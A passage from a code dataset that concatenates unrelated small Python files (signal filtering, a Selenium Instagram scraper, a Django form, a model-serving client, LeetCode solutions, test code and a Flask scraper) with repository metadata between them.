"""
self.inputdim = inputdim
self.order = order
## filtering
self.axis = [AxisFilter(stepsize, order, window) for _ in range(inputdim)]
## observations space
self.observations = np.zeros((1,self.inputdim*self.order))
self.mean = np.zeros(self.inputdim*self.order)
self.icov = np.eye(self.inputdim*self.order)
## variable logic
self.counter = 0
self.start_buffer = start_buffer
self.periodic_recompute = periodic_recompute
self.number_of_neighbour = 5
self.number_of_stdev = 4.5
self.last_sample = np.zeros(self.inputdim*self.order)
def new_sample(self, ms, ndata):
"""Passes a new observed sample to the motionexplorer. It will filter it based on the last
observed sample and compute the distance of this current sample to all previously saved
original samples. If the average distance of the N nearest neightbour is greater than X
stdev, then the current sample is saved to the class attribute observations.
Parameters
----------
ms : int
Timestamp in milliseconds. This can be easily produced with the time module and the
call to: int(round(time.time() * 1000)).
ndata : iterable
An iterable object (tuple, ndarray, ..) representing the N dimensional vector of the
current sample.
Returns
-------
int, bool
average Mahalanobis distance to the K nearest neighboour and flag saying if the
current sample is added to the set of original observations.
"""
## ndata.shape == inputdim
self.counter += 1
for i, data in enumerate(ndata):
self.axis[i].new_sample(ms, data)
## recompute mean and icov every periodic_recompute
if self.counter % self.periodic_recompute == 0:
self.compute_observations_mean_icov()
## get last sample from each axis and squash to 1D
sample = np.array([self.axis[i].samples[-1] for i in range(self.inputdim)]).reshape(-1)
## compute the distance of sample to all stored observations
distances = self.distance_to_observations(sample)
distance_meank = np.mean(distances[:self.number_of_neighbour])
if (self.counter > self.start_buffer) and self.axis[0].full:
## keep the sample if further than number of stdev to previous observations
if distance_meank > self.number_of_stdev:
self.observations = np.vstack((self.observations, sample))
added = True
else: added = False
else:
added = False
self.last_sample = sample
return distance_meank, added
def distance_to_observations(self, vector):
"""Return the Mahalanobis distance of vector to the space of all observations.
The ouput distances are sorted.
https://en.wikipedia.org/wiki/Mahalanobis_distance
"""
diff = self.observations - vector
distances = np.sqrt(np.diag(np.dot(np.dot(diff, self.icov), diff.T)))
return np.sort(distances)
def compute_observations_mean_icov(self):
self.mean = np.mean(self.observations, axis=0)
# print self.observations.shape[0]
if self.observations.shape[0] > 1:
self.icov = np.linalg.pinv(np.cov((self.observations-self.mean).transpose()))
class AxisFilter:
"""Filters an unevenly sampled measurement dimension. It interpolates at constant time steps `stepsize` in ms, performs Butter worth filetering and Savitsky Golay interpolation of order `order` over a moving window `window`.
"""
def __init__(self, stepsize, order, window):
"""
Parameters
----------
stepsize : int
The size of the interpolation step in milliseconds.
order : int
The dimension of the output vector, 1 is position only, 2 includes velocity, 3 provides acceleration, and so on.
window : int
The size of the averaging window in samples.
"""
self.stepsize = stepsize
self.order = order
self.interpolator = TimeInterpolator(stepsize)
self.sgfitter = SavitskyGolayFitter(order, window)
self.full = False
def new_sample(self, time, value):
self.samples = np.empty((0,self.order))
self.interpolator.new_sample(time, value)
for point in self.interpolator.value_steps:
point = self.sgfitter.new_sample(point)
self.samples = np.vstack((self.samples, point))
self.full = self.sgfitter.full
class TimeInterpolator:
"""Interpolate between 2 measurements at constant step size X in ms.
"""
def __init__(self, stepsize):
self.stepsize = stepsize
self.firstpoint = True
def new_sample(self, time, value):
if self.firstpoint == True:
self.firstpoint = False
self.time_steps = np.array([time])
self.value_steps = np.array([value])
else:
self.time_steps = np.arange(self.last_time, time, self.stepsize)
self.value_steps = np.interp(self.time_steps, [self.last_time, time], [self.last_value, value])
self.last_time = time
self.last_value = value
class SavitskyGolayFitter:
def __init__(self, order = 4, window = 30):
self.order = order
if window%2==0:
window = window + 1
self.window = window
#compute the savitzky-golay differentiators
sgolay = self.savitzky_golay(order, window)
self.sgolay_diff = []
self.buffers = []
self.samples = 0
self.full = False
#create the filters
for i in range(order):
self.sgolay_diff.append(np.ravel(sgolay[i, :]))
self.buffers.append(IIRFilter(self.sgolay_diff[i], [1]))
def new_sample(self, x):
self.samples = self.samples + 1
if self.samples>self.window:
self.full = True
fits = np.zeros((self.order,))
# use enumerate or map
c = 0
for buffer in self.buffers:
fits[c] = buffer.filter(x)
c = c + 1
return fits
#sg coefficient computation
def savitzky_golay(self, order = 2, window = 30):
if window is None:
window = order + 2
if window % 2 != 1 or window < 1:
raise TypeError("window size must be a positive odd number")
if window < order + 2:
raise TypeError("window size is too small for the polynomial")
# A second order polynomial has 3 coefficients
order_range = range(order+1)
half_window = (window-1)//2
B = np.mat(
[ [k**i for i in order_range] for k in range(-half_window, half_window+1)] )
M = np.linalg.pinv(B)
return M
class IIRFilter:
def __init__(self, B, A):
"""Create an IIR filter, given the B and A coefficient vectors.
"""
self.B = B
self.A = A
if len(A)>2:
self.prev_outputs = Ringbuffer(len(A)-1)
else:
self.prev_outputs = Ringbuffer(3)
self.prev_inputs = Ringbuffer(len(B))
def filter(self, x):
"""Take one sample and filter it. Return the output.
"""
y = 0
self.prev_inputs.new_sample(x)
k =0
for b in self.B:
y = y + b * self.prev_inputs.reverse_index(k)
k = k + 1
k = 0
for a in self.A[1:]:
y = y - a * self.prev_outputs.reverse_index(k)
k = k + 1
y = y / self.A[0]
self.prev_outputs.new_sample(y)
return y
def new_sample(self, x):
return self.filter(x)
class Ringbuffer:
def __init__(self, size, init=0):
if size<1:
throw(Exception("Invalid size for a ringbuffer: must be >=1"))
self.n_samples = size
self.samples = np.ones((size,))*init
self.read_head = 1
self.write_head = 0
self.sum = 0
def get_length(self):
return self.n_samples
def get_samples(self):
return np.hstack((self.samples[self.read_head-1:],self.samples[0:self.read_head-1]))
def get_sum(self):
return self.sum
def get_output(self):
#self.read_head %= self.n_samples
return self.samples[self.read_head-1]
def get_mean(self):
return self.sum / float(self.n_samples)
def forward_index(self, i):
new_index = self.read_head+i-1
new_index = new_index % self.n_samples
return self.samples[new_index]
def reverse_index(self, i):
new_index = self.write_head-i-1
while new_index<0:
new_index+=self.n_samples
return self.samples[new_index]
def new_sample(self, x):
s = self.samples[self.write_head]
self.samples[self.write_head] = x
self.sum += x
self.sum -= self.samples[self.read_head]
self.read_head += 1
self.write_head += 1
self.read_head %= self.n_samples
self.write_head %= self.n_samples
return s
| true |
00582004e5397ac8064b355e0019f89538d9061b | Python | FitCoderOfficial/Bible_Scraper | /instagram.py | UTF-8 | 1,150 | 2.515625 | 3 | [] | no_license | from selenium import webdriver
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
import requests
import time
import json
import os
import csv
# Chrome의 경우 | 아까 받은 chromedriver의 위치를 지정해준다.
driver = webdriver.Chrome('D:\Works\PG_Works\Bible_Scraper\chromedriver')
# 암묵적으로 웹 자원 로드를 위해 3초까지 기다려 준다.
driver.implicitly_wait(3)
# url에 접근한다.
driver.get('https://www.instagram.com/xxxibgdrgn')
#driver.get('https://wol.jw.org/en')
# #현재 링크 확인
current_link = driver.current_url
req = requests.get(current_link)
r = req.text
soup = BeautifulSoup(r, 'html.parser')
# follower = soup.select('meta', {'name': 'description'})['content']
# for i in follower:
# print(i.get_text())
# print (follower)
start = '"edge_followed_by":{"count":'
end = '},"followed_by_viewer"'
followers= r[r.find(start)+len(start):r.rfind(end)]
start = '"edge_follow":{"count":'
end = '},"follows_viewer"'
following= r[r.find(start)+len(start):r.rfind(end)]
text_verified = 'Verified'
isVerified = r[r.find(text_verified)]
print(followers, following, )
| true |
05810cd900ba6aa894357bb25b570c601ae0a660 | Python | jeroenarens/Apps4Ghent_Bib | /Apps4Ghent_Library/apps4ghent/forms.py | UTF-8 | 626 | 2.703125 | 3 | [] | no_license | from django import forms
#This form is used for the purpose of the REC, here a form is created where you can choose your birth year (decade) and sex (M/F)
DECADE_CHOICES = [(1940,'1940'),(1950,'1950'),(1960,'1960'),(1970,'1970'),(1980,'1980'),(1990,'1990'),(2000,'2000')]
SEX_CHOICES = [('M','Male'),('V','Female')]
CATEGORY_CHOICES = [('fictie','Fiction'),('non-fictie', 'Non-fiction')]
class booksform(forms.Form):
decade = forms.ChoiceField(required=True, choices=DECADE_CHOICES)
sex = forms.ChoiceField(required=True, choices=SEX_CHOICES)
category = forms.ChoiceField(required=True, choices=CATEGORY_CHOICES)
| true |
570606e8d44b01b11f6c84f8583ce195c70224cf | Python | harshi12/AI_On_The_Edge_Platform | /models/iris/app/predict_cl.py | UTF-8 | 1,097 | 2.796875 | 3 | [] | no_license | import pandas as pd
import json
import sys
import requests
test_data = sys.argv[1]
IP = input("Enter server IP:")
test_data = pd.read_csv(test_data, header = None)
test_data = test_data.iloc[1:,:-1]
request_str = {"signature_name": "predict","instances":[]}
for index,row in test_data.iterrows():
temp = {"sepal_length":[float(row[0])],"sepal_width":[float(row[1])],"petal_length":[float(row[2])],"petal_width":[float(row[3])]}
request_str['instances'].append(temp)
data = json.dumps(request_str)
headers = {"content-type": "application/json"}
json_response = requests.post('http://'+IP+':9500/v1/models/iris:predict', data=data, headers=headers)
json_response = json.loads(str(json_response.text))
f = open('predictions.txt', 'w')
print(json_response)
ans =json_response["predictions"]
for i in range(len(ans)):
if ans[i]['classes'] == ['0']:
print('Iris-Setosa')
f.write('Iris-Setosa\n')
elif ans[i]['classes'] == ['1']:
print('Iris-Virginica')
f.write('Iris-Virginica\n')
elif ans[i]['classes'] == ['2']:
print('Iris-Versicolor')
f.write('Iris-Versicolor\n')
f.close()
| true |
f53f9489a17f55be8659df1a8cc472a3cdfdd7e2 | Python | rcc-uchicago/rcc-intro | /scripts/python_pool.py | UTF-8 | 374 | 3.046875 | 3 | [] | no_license | '''
A simple code to demonstrate how to use multiple cores to speed up
a program.
This code is going to use 4 cores to calculate eigen vectors of 4 random matrices.
'''
import numpy
from multiprocessing import Pool
from itertools import repeat
num_cores = 4
pool = Pool(num_cores)
pool.map(numpy.linalg.eig,repeat(numpy.random.rand(1000,1000),num_cores))
| true |
eff1e16cd1e32684d38179c9a24f395df1805f32 | Python | xulzee/LeetCodeProjectPython | /48. Rotate Image.py | UTF-8 | 1,657 | 3.609375 | 4 | [] | no_license | # -*- coding: utf-8 -*-
# @Time : 2019/2/27 16:02
# @Author : xulzee
# @Email : xulzee@163.com
# @File : 48. Rotate Image.py
# @Software: PyCharm
from typing import List
class Solution:
def rotate1(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
for i in range(len(matrix)):
for j in range(i + 1, len(matrix[0])):
matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
matrix[i] = matrix[i][::-1]
def rotate(self, matrix: List[List[int]]) -> None:
start_row, start_column = 0, 0
end_row, end_column = len(matrix) - 1, len(matrix) - 1
while start_row < end_row:
self.rotateEdge(matrix, start_row, start_column, end_row, end_column)
start_row += 1
start_column += 1
end_row -= 1
end_column -= 1
def rotateEdge(self, matrix: list, start_row: int, start_column: int, end_row: int, end_column: int) -> None:
times = end_row - start_row
for i in range(times):
temp = matrix[start_row][start_column + i]
matrix[start_row][start_column + i] = matrix[end_row - i][start_column]
matrix[end_row - i][start_column] = matrix[end_row][end_column - i]
matrix[end_row][end_column - i] = matrix[start_row + i][end_column]
matrix[start_row + i][end_column] = temp
if __name__ == '__main__':
A = [
[5, 1, 9, 11],
[2, 4, 8, 10],
[13, 3, 6, 7],
[15, 14, 12, 16]
]
# Solution().rotate(A)
Solution().rotate(A)
print(A)
| true |
790b32a9dbdb61babbaf6fd8b50965556f98b31d | Python | adrn/longslit | /scripts/init_pipeline.py | UTF-8 | 2,466 | 2.6875 | 3 | [
"MIT"
] | permissive | # coding: utf-8
""" Initialize the 1D spectral reduction pipeline. """
# Standard library
import os
from os.path import abspath, expanduser, exists, join
import sys
# Third-party
import yaml
# Package
from longslit.log import logger
def main(name, rootpath):
rootpath = abspath(expanduser(rootpath))
if not exists(rootpath):
raise IOError("Path '{}' doesn't exist!".format(rootpath))
pipeline_path = join(rootpath, 'longslit', name)
os.makedirs(pipeline_path, exist_ok=True)
logger.debug('Pipeline output path: {}'.format(pipeline_path))
global_config_filename = join(pipeline_path, '{}-config.yml'.format(name))
if exists(global_config_filename):
logger.error("Config file already exists at '{}'\n ignoring..."
.format(global_config_filename))
sys.exit(1)
defaults = dict()
defaults['name'] = name
defaults['dispersion_axis'] = 0
defaults['overscan'] = 0
defaults['path_exclude'] = ['']
defaults['path_include'] = ['']
defaults['gain'] = '2.7 electron/adu'
defaults['read_noise'] = '7.9 electron'
with open(global_config_filename, 'w') as f:
yaml.dump(defaults, f)
logger.info('Created template pipeline global config file at: {}'
.format(global_config_filename))
for k,v in defaults.items():
logger.debug('{} = {}'.format(k, v))
if __name__ == "__main__":
from argparse import ArgumentParser
import logging
# Define parser object
parser = ArgumentParser(description="")
parser.add_argument("-v", "--verbose", action="store_true", dest="verbose",
default=False, help="Be chatty! (default = False)")
parser.add_argument("-q", "--quiet", action="store_true", dest="quiet",
default=False, help="Be quiet! (default = False)")
parser.add_argument("-n", "--name", dest="name", required=True, type=str,
help="The name of this reduction pipeline run.")
parser.add_argument("--rootpath", dest="rootpath", required=True,
type=str, help="Path to root directory containing data files.")
args = parser.parse_args()
# Set logger level based on verbose flags
if args.verbose:
logger.setLevel(logging.DEBUG)
elif args.quiet:
logger.setLevel(logging.ERROR)
else:
logger.setLevel(logging.INFO)
main(name=args.name, rootpath=args.rootpath)
| true |
5b376b580bd83c28d60cc0883c1135bf03e0d83f | Python | noika/pyladies.hw | /210piskvorky.py | UTF-8 | 220 | 3.375 | 3 | [] | no_license | pole = 20*"-"
def tah(pole, cislo_policka, symbol):
"""Vrátí herní pole s daným symbolem umístěným na danou pozici"""
return pole[:cislo_policka-1] + symbol + pole[cislo_policka +1:]
print(tah(pole, 20, "o"))
| true |
9a843afc20d497970d2d2856260e7a6936fa7be3 | Python | trevor91/algorithm | /beakjoon/9376.py | UTF-8 | 1,801 | 2.875 | 3 | [] | no_license | import sys, re
from heapq import heappush, heappop
read = lambda: sys.stdin.readline()
def check(x,y):
if x == 0 or y == 0 or x == w-1 or y == w-1:
return(True)
return(False)
def go(i):
while prisoners:
wall, (cur_x, cur_y) = heappop(prisoners)
print(wall, (cur_x, cur_y), visited[i])
if check(cur_x,cur_y):
return(wall,cur_x,cur_y)
if i == 1 and (cur_x, cur_y) in visited[0]:
return(wall,cur_x,cur_y)
for calc_x, calc_y in zip(move_x, move_y):
pre_x = calc_x + cur_x
pre_y = calc_y + cur_y
if cur_x >= 0 and pre_y >= 0 and pre_x < w and pre_y < h:
if not (pre_x, pre_y) in visited[i]:
if (blueprint[pre_y][pre_x] == '.') or (blueprint[pre_y][pre_x] == '$'):
heappush(prisoners, (wall, (pre_x, pre_y)))
elif blueprint[pre_y][pre_x] == '#':
heappush(prisoners, (wall+1, (pre_x, pre_y)))
visited[i].add((pre_x, pre_y))
if __name__ == '__main__':
testcase = int(read().strip())
move_x = [0,0,1,-1]
move_y = [1,-1,0,0]
for _ in range(testcase):
h, w = map(int,read().split())
blueprint = []
first_prisoners = []
prisoners = []
visited = [set(),set()]
for i in range(h):
temp = read().strip()
blueprint.append([x for x in temp])
prisoner = [t.start() for t in re.finditer('\$',temp)]
for j in prisoner:
first_prisoners.append((0,(j,i)))
rst = 0
for i, data in enumerate(first_prisoners):
heappush(prisoners, data)
visited[i].add(data[1])
temp, x, y = go(i)
if i == 0:
temp_set = set()
while True:
if (x, y) == data[1]:
break
for calc_x, calc_y in zip(move_x, move_y):
if (calc_x + x, calc_y + y) in visited[0]:
temp_set.add((calc_x + x, calc_y + y))
print('temp: ' ,temp_set)
visited[0].intersection_update(temp_set)
rst += temp
print(rst) | true |
4147bf499a6ae26cdf23d08897df9958417c2b37 | Python | MtTsai/Leetcode | /python/131.palindrome_partitioning.py | UTF-8 | 520 | 3.171875 | 3 | [] | no_license | class Solution(object):
def partition(self, s):
"""
:type s: str
:rtype: List[List[str]]
"""
out = []
def find(string, curr, out):
if string == '':
out.append(curr)
else:
for i in range(len(string)):
subs = string[:i + 1]
if subs == subs[::-1]:
find(string[i + 1:], curr + [subs], out)
find(s, [], out)
return out
| true |
949982f9039d9f4dbbf3fd0a6e08e47382434247 | Python | kcc/sanitizers | /address-sanitizer/tools/kernel_test_parse.py | UTF-8 | 5,493 | 2.65625 | 3 | [
"NCSA",
"MIT",
"LLVM-exception",
"Apache-2.0"
] | permissive | """
Parser for unit test output in kernel logs.
Each test should write special messages to kernel log:
##### TEST_START <test_name> denotes the beginning of the test log
##### TEST_END <test_name> denotes the finnish of the test log
##### FAIL <reason> denotes the test failed
##### ASSERT '<regex>' - we should search for the regex in other lines of the
test's output. If it's not found, the test fails
"""
import re
import sys
import difflib
import argparse
TEST_START_RE = re.compile(r"##### TEST_START (.*)$")
TEST_END_RE = re.compile(r"##### TEST_END (.*)$")
ASSERT_RE = re.compile(r"##### ASSERT '(.*)'")
FAIL_RE = re.compile(r"##### FAIL (.*)$")
parser = argparse.ArgumentParser(
description = "Parser for unit kernel test logs from input",
usage = "dmesg | test_parse.py [options]")
parser.add_argument("--brief", action = "store_true",
help = "Brief output (onlu PASSED or FAILED for each test")
parser.add_argument("--failed_log", action = "store_true",
help = "output full log for failed tests")
parser.add_argument("--assert_candidates", type = int, metavar = "N",
help = "output N closest candidates to fit the failed assert.")
parser.add_argument("--annotate", action = "store_true",
help = "special output for buildbot annotator")
parser.add_argument("--allow_flaky", nargs = '*', metavar = "name",
help = "allow the listed tests to be flaky")
args = parser.parse_args()
def ExtractTestLogs(kernel_log):
all_tests = []
current_test_lines = []
current_test = None
for line in sys.stdin:
l = line.strip()
if current_test:
if TEST_END_RE.search(l):
all_tests.append((current_test, current_test_lines))
current_test = None
current_test_lines = []
else:
current_test_lines.append(l)
else:
m = TEST_START_RE.search(l)
if m:
current_test = m.group(1)
return all_tests
def FindFailures(lines):
failures = []
for l in lines:
m = FAIL_RE.search(l)
if m:
failures.append(m.group(1))
return failures
def FindAssertFailures(lines):
failed_asserts = []
for l in lines:
m = ASSERT_RE.search(l)
if m:
current_assert_re = re.compile(m.group(1))
has_matches = False
for checkedline in lines:
if ASSERT_RE.search(checkedline):
continue
if current_assert_re.search(checkedline):
has_matches = True
break
if not has_matches:
failed_asserts.append(current_assert_re.pattern)
return failed_asserts
def PrintTestReport(test, run_reports):
passed = 0
failed = 0
for result, _, _, _ in run_reports:
if result:
passed += 1
else:
failed += 1
if passed and not failed:
total_result = "PASSED (%d runs)" % passed
elif failed and not passed:
total_result = "FAILED (%d runs)" % failed
else:
total_result = "FLAKY (%d passed, %d failed, %d total)" % (
passed, failed, passed + failed)
print "TEST %s: %s" % (test, total_result)
if args.brief:
return
for index, (_, failures, failed_asserts, lines) in enumerate(run_reports):
if not failures and not failed_asserts:
continue
print " Run %d" % index
for f in failures:
print " Failed: %s" % s
missing_matches = not args.assert_candidates
for a in failed_asserts:
print " Failed assert: %s" % a
if args.assert_candidates:
print " Closest matches:"
matches = difflib.get_close_matches(a, lines, args.assert_candidates, 0.4)
matches = [match for match in matches if not ASSERT_RE.search(match)]
for match in matches:
print " " + match
if not matches:
missing_matches = True
if args.failed_log and (failures or missing_matches):
print " Test log:"
for l in lines:
print " " + l
def PrintBuildBotAnnotation(passed, failed, flaky, flaky_not_allowed):
if not passed and not failed and not flaky:
print "@@@STEP_TEXT: NO TESTS WERE RUN@@@"
print "@@@STEP_FAILURE@@@"
print "@@@STEP_TEXT@tests:%d passed:%d failed:%d flaky:%d@@@" % (passed + failed + flaky, passed, failed, flaky)
if failed or flaky_not_allowed:
print "@@@STEP_FAILURE@@@"
def GroupTests(tests):
result = {}
for test, lines in tests:
if test not in result:
result[test] = []
result[test].append(lines)
return result
def main():
all_tests = ExtractTestLogs(sys.stdin)
grouped_tests = GroupTests(all_tests)
total_passed = 0
total_failed = 0
total_flaky = 0
flaky_not_allowed = False
for test, runs in grouped_tests.iteritems():
passed = 0
failed = 0
run_reports = []
for lines in runs:
failed_asserts = FindAssertFailures(lines)
failures = FindFailures(lines)
if failed_asserts or failures:
failed += 1
else:
passed += 1
run_reports.append((not failed_asserts and not failures, failures, failed_asserts, lines))
if passed and not failed:
total_passed += 1
elif failed and not passed:
total_failed += 1
else:
total_flaky += 1
if not args.allow_flaky or (test not in args.allow_flaky):
flaky_not_allowed = True
PrintTestReport(test, run_reports)
if args.annotate:
PrintBuildBotAnnotation(total_passed, total_failed, total_flaky, flaky_not_allowed)
if __name__ == '__main__':
main()
| true |
7b4f644a64edbb4d68c1b47e5c2112a26f082756 | Python | rpural/DailyCodingProblem | /Daily Coding Problem/findPatterns.py | UTF-8 | 579 | 3.6875 | 4 | [] | no_license | #! /usr/bin/env python3
''' Daily Coding Problem
This problem was asked by Microsoft.
Given a string and a pattern, find the starting indices of all occurrences of
the pattern in the string. For example, given the string "abracadabra" and the
pattern "abr", you should return [0, 7].
'''
import re
teststring = "abracadabra"
searchstring = "abr"
def matches(search, test):
result = list()
for match in re.finditer(search, test):
result.append(match.start())
return result
if __name__ == "__main__":
print( matches( searchstring, teststring) )
| true |
8d45c718874bf3177a788ebde3f04f05645cee83 | Python | Shashvat6264/flappy_bird | /sprites.py | UTF-8 | 1,720 | 3.078125 | 3 | [] | no_license | # Sprite classes for the platformer game
import pygame as pg
import random
from settings import *
from graphics import *
class Player(pg.sprite.Sprite):
def __init__(self, game):
pg.sprite.Sprite.__init__(self)
self.game = game
self.g = Graphics()
self.image = pg.Surface((70,70))
self.image = self.g.bird_anim[0]
self.frame = 0
self.frame_rate = 500
self.last_update = pg.time.get_ticks()
# self.image.fill(BLUE)
self.rect = self.image.get_rect()
self.rect.center = (WIDTH/2,HEIGHT/2)
def update(self, x, y):
self.rect.x = x
self.rect.y = y
now = pg.time.get_ticks()
if now - self.last_update > self.frame_rate:
self.frame += 1
if self.frame == len(self.g.bird_anim):
self.frame = 0
else:
center = self.rect.center
self.image = self.g.bird_anim[self.frame]
self.rect = self.image.get_rect()
self.rect.center = center
class Mob(pg.sprite.Sprite):
def __init__(self, game, x):
pg.sprite.Sprite.__init__(self)
self.image = pg.Surface((50, random.randint(HEIGHT/4,HEIGHT*3/4)))
self.image.fill(RED)
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = random.randint(HEIGHT/10,HEIGHT*9/10)
self.velx = 10
self.game = game
def update(self):
if self.rect.x > 0:
self.rect.x -= self.velx
else:
m = Mob(self.game, WIDTH)
self.game.all_sprites.add(m)
self.game.mobs.add(m)
self.kill()
self.game.score += 1
| true |
5ff459002d8930742ff638ea1063a8ac70c2c602 | Python | brunadelmourosilva/cursoemvideo-python | /mundo2/ex054_idade.py | UTF-8 | 630 | 4.1875 | 4 | [] | no_license | #Exercício Python 54: Crie um programa que leia o ano de nascimento de sete pessoas.
#No final, mostre quantas pessoas ainda não atingiram a maioridade e quantas já são maiores.
from datetime import date
atual = date.today().year
contJovem = 0
contAdulto = 0
for i in range(1, 7+1):
y = int(input('Insira o ano de nascimento da pessoa {}: '.format(i)))
idade = atual - y
if idade >= 18:
contAdulto += 1
else:
contJovem += 1
print('\033[1;35;40m {} \033[m pessoa não copletaram 18 anos.'. format(contJovem))
print('\033[1;31;44m {} \033[m pessoas já copletaram 18 anos.'. format(contAdulto)) | true |
ab010a0525dc5cb56da30839259a7157551ca887 | Python | OnaiNet/rgt_3.14 | /bwilkes/code/CreateAndSendJson.py | UTF-8 | 498 | 2.578125 | 3 | [] | no_license | import sys
import json
import requests
headers = {'Content-type': 'application/json'}
json_string = '{"message": "' + str(sys.argv[1:]) + '"}'
#print(json_string)
json_string = json_string.replace("[","")
#print(json_string)
json_string = json_string.replace("]","")
#print(json_string)
json_string = json_string.replace("'","")
#print(json_string)
print(len(json_string))
r = requests.post("http://67.166.103.221:60916/telephone/", data=json_string, headers=headers)
print(r.status_code)
| true |
5311273b7d6dbf457da83c2bcc83695400f152d9 | Python | Supercap2F/PiCAM | /src/PiCAM3.py | UTF-8 | 5,212 | 2.671875 | 3 | [] | no_license | from Tkinter import *
import ttk
import threading
from picamera import PiCamera
import tkMessageBox
class App:
def __init__(self,master):
#self.grid();
# Make a canvas where a camera preview will be
#self.CanvasPreview = Canvas(master,width=200,height=200);
#self.CanvasPreview.grid(row=0, column=0, rowspan=10);
photo = PhotoImage(file="img.gif");
self.ImagePreview = Label(master, image=photo,width=200,height=200);
self.ImagePreview.photo = photo;
self.ImagePreview.grid(row=0, column=0, rowspan=50, padx=10, pady=30, sticky=N);
# add a status bar
#self.StatusBar = Label(master, text="Please enter Values:");
#self.StatusBar.grid(row=0, column=1, columnspan=2);
vcmd = (master.register(self.validate), '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
# add the frames label
self.FramesLabel=Label(master, text="Frames");
self.FramesLabel.grid(row=0, column=1, columnspan=2, sticky=SW);
# add the frames input
self.FramesEntry=Entry(master,validate = 'key', validatecommand = vcmd);
self.FramesEntry.grid(row=1, column=1, columnspan=2,padx=(0, 10));
# add the interval label
self.IntervalLabel=Label(master, text="Interval (in sec)");
self.IntervalLabel.grid(row=2, column=1, columnspan=2, sticky=SW);
# add the interval input
self.IntervalEntry=Entry(master,validate = 'key', validatecommand = vcmd);
self.IntervalEntry.grid(row=3, column=1, columnspan=2,padx=(0, 10));
# add the quit button
self.QuitButton = Button(master,text="Quit",command=master.quit);
self.QuitButton.grid(row=4, column=1, sticky=E+W);
# add the start button
self.StartButton = Button(master,text="Start", command=self.StartRecording);
self.StartButton.grid(row=4, column=2, sticky=E+W,padx=(0, 10));
# add a progress bar
self.ProgressBar = ttk.Progressbar(master, orient="horizontal", maximum=100 ,length=200, mode="determinate");
self.ProgressBar.grid(row=5, column=0, columnspan=3, sticky=W+E, padx=10);
self.ProgressBar["value"] = 50;
master.grid_columnconfigure(0,weight=1)
master.grid_columnconfigure(1,weight=1)
master.grid_columnconfigure(2,weight=1)
master.grid_rowconfigure(0,weight=1)
master.grid_rowconfigure(1,weight=1)
master.grid_rowconfigure(2,weight=1)
master.grid_rowconfigure(3,weight=1)
master.grid_rowconfigure(4,weight=1)
master.grid_rowconfigure(5,weight=1)
master.grid_rowconfigure(6,weight=1)
def StartRecording(self):
if(self.FramesEntry.get()=="" or self.IntervalEntry.get()==""):
tkMessageBox.showwarning("No input","Please fill in all fields");
return;
s=self.FramesEntry.get();
self.CameraTotalFrames=int(s)
f=self.IntervalEntry.get();
self.CameraInterval=int(f)
self.CameraCount=0;
self.FramesEntry.config(state=DISABLED);
self.IntervalEntry.config(state=DISABLED);
self.StartButton.config(state=DISABLED);
self.ImagePreview.focus(); #focus on a random widget
print self.CameraInterval
print self.CameraTotalFrames
self.camera.resolution = (1080,720);
Preview=False;
self.CaptureFrames();
def CaptureFrames(self):
if self.CameraCount < self.CameraTotalFrames:
self.camera.capture('./lapse/img%03d.jpg' % self.CameraCount);
print('Captured img%03d.jpg' % self.CameraCount);
self.CameraCount+=1;
root.after(self.CameraInterval, self.CaptureFrames);
else:
print "test"
self.FramesEntry.config(state=NORMAL);
self.IntervalEntry.config(state=NORMAL);
self.StartButton.config(state=NORMAL);
Preview=True;
# function to check input to make sure the value is only numbers
def validate(self, action, index, value_if_allowed, prior_value, text, validation_type, trigger_type, widget_name):
if(action=='1'):
if text in '0123456789.-+':
try:
float(value_if_allowed)
return True
except ValueError:
tkMessageBox.showwarning("Invalid Entry","Please enter only numbers");
return False
else:
tkMessageBox.showwarning("Invalid Entry","Please enter only numbers");
return False
else:
return True
root=Tk();
app=App(root);
root.attributes("-fullscreen",True); # fullscreen app
#app.IntervalEntry.focus(); # make sure the app has the focus
app.camera = PiCamera(); # setup the camera
def thread1(self):
self.preview=True;
while True:
if(self.preview):
app.camera.resolution = (200,200);
app.camera.capture('preview.gif');
photo = PhotoImage(file="preview.gif");
app.ImagePreview.config(image=photo);
app.ImagePreview.photo=photo;
t = threading.Thread(target=thread1)
t.start()
t.preview=False;
#root.after(0,UpdatePreview);
root.mainloop();
root.destroy();
| true |
fe6e9123eeaa721958248e20ef6c5fbac069aa0a | Python | knakamor/projects | /OOP/src/test_war.py | UTF-8 | 1,595 | 3.390625 | 3 | [] | no_license | import nose.tools as n
from deck import Card
from war import War
from war_player import Player
def test_player_init():
player = Player("name")
n.assert_equal(len(player), 0)
n.assert_is_none(player.play_card())
def test_player_receive_play():
player = Player("name")
card = Card("J", "c")
player.receive_card(card)
n.assert_equal(len(player), 1)
n.assert_equal(player.play_card(), card)
n.assert_equal(len(player), 0)
def test_war_deal():
game = War(human=False)
n.assert_equal(len(game.player1), 26)
n.assert_equal(len(game.player2), 26)
def test_play_round():
game = War(human=False)
game.play_round()
n.assert_equal(len(game.player1) + len(game.player2), 52)
def test_play_game():
game = War(human=False)
game.play_game()
n.assert_equal(len(game.player1) + len(game.player2) + len(game.pot), 52)
n.assert_is_not_none(game.winner)
if game.player1.name == game.winner:
n.assert_equal(len(game.player2), 0)
else:
n.assert_equal(len(game.player1), 0)
def test_war_size():
game = War(war_size=5, human=False)
game.play_round() #Play first to shuffle hand
game.war()
n.assert_equal(len(game.pot), 10)
def test_play_two_of_three():
game = War(human=False)
#There should be a dictionary that tracks win counts.
n.assert_equal(max(game.win_counts.values()), 0)
game.play_two_of_three()
n.assert_equal(max(game.win_counts.values()), 2)
#Make sure you don't get too many cards!
n.assert_equal(len(game.player1) + len(game.player2) + len(game.pot), 52)
| true |
78bcb9864ee620ae3b9f2ab23854cb8b5f0d69f6 | Python | vikas456/uteats | /parser.py | UTF-8 | 6,442 | 2.59375 | 3 | [] | no_license | from datetime import datetime
from urllib2 import urlopen as uReq
from bs4 import BeautifulSoup as soup
from flask import Flask, render_template, url_for
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
@app.route("/")
def main():
time = str(datetime.now().time().hour)
day = datetime.today().weekday()
dining_url = 'http://housing.utexas.edu/dining/hours'
uClient = uReq(dining_url)
page_html = uClient.read()
uClient.close()
page_soup = soup(page_html, "html.parser")
